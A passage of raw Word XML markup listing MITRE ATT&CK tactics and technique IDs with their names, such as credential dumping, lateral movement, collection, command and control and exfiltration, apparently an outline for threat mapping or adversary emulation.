          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:Clear Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C27335"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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CAA162"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1003.003', 'T1110', 'T1110.001', 'T1110.003', 'T1003', 'T1528', 'T1040', 'T1056.001', 'T1003.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DDA03"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T1003.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:NTDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC15B69"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r w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1110 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DCBF7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T1110.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Brute Force&gt;:Password Guessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8F2A5"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T1110.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Brute Force&gt;:Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F717E4F"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1003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OS Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007526C"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1528 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Steal Application Access Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1DC25"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1040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409721E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74760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD5A91"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T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12881B82"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1040', 'T1083', 'T1057', 'T1120']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9411D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1040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7DFCC6"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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155723F1"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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A94EA"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1120 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Peripheral Device Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFFAFF8"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1021.002', 'T1550.001', 'T1210', 'T1550.002', 'T1091']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0EAA9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T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B23EB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T1550.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Application Access Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411BC0C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1210 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation of Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE6548"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T1550.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03406BB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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970851F"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1213', 'T1074.002', 'T1560.001', 'T1039', 'T1560', 'T1114.002', 'T1119', 'T1213.002', 'T1005', 'T1074.001', 'T1025', 'T1056.001', 'T1113']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAFE0F6"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1213 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Information Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12562106"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T1074.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Remote Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3DACF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T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222162B"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1039 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Network Shared Drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B92233"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1560 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Archive Collected Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1961C94F"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74760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1114</w:t>
      </w:r>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Email Collection&gt;:Remote Email Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577499D0"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1119 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DB0A8"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1213.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data from Information Repositories&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sharepoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CAEECAD"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAAC46"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T1074.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Local Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6FC3FC"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1025 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE6A1F"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435E0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00435E0B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9FD5B"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r w:rsidRPr="004230DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004230DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1113 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004230DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Screen Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73795A95"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1090.003', 'T1102.002', 'T1071.001', 'T1573.001', 'T1092', 'T1105', 'T1071.003', 'T1090.002', 'T1001.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1194EDC2"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T1090.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:Multi-hop Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971E70C"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T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B97A58" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="008001A4" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008001A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008001A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03976AA6"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1F1708">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1573.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1708">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Encrypted Channel&gt;:Symmetric Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E30C43"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1092 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Communication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A5BC1" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="00674760" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00674760">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147EC6CB"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T1071.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Mail Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9D1EC1"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T1090.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:External Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB1B71E"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T1001.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Obfuscation&gt;:Junk Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CACE0B"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1030', 'T1048.002', 'T1567']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F5528"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1030 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Transfer Size Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3982E59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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1048.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAE36F4" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="00605F46"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00762FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00762FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1567 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00762FF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over Web Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F26D3" w14:textId="77777777" w:rsidR="00605F46" w:rsidRPr="00605F46" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
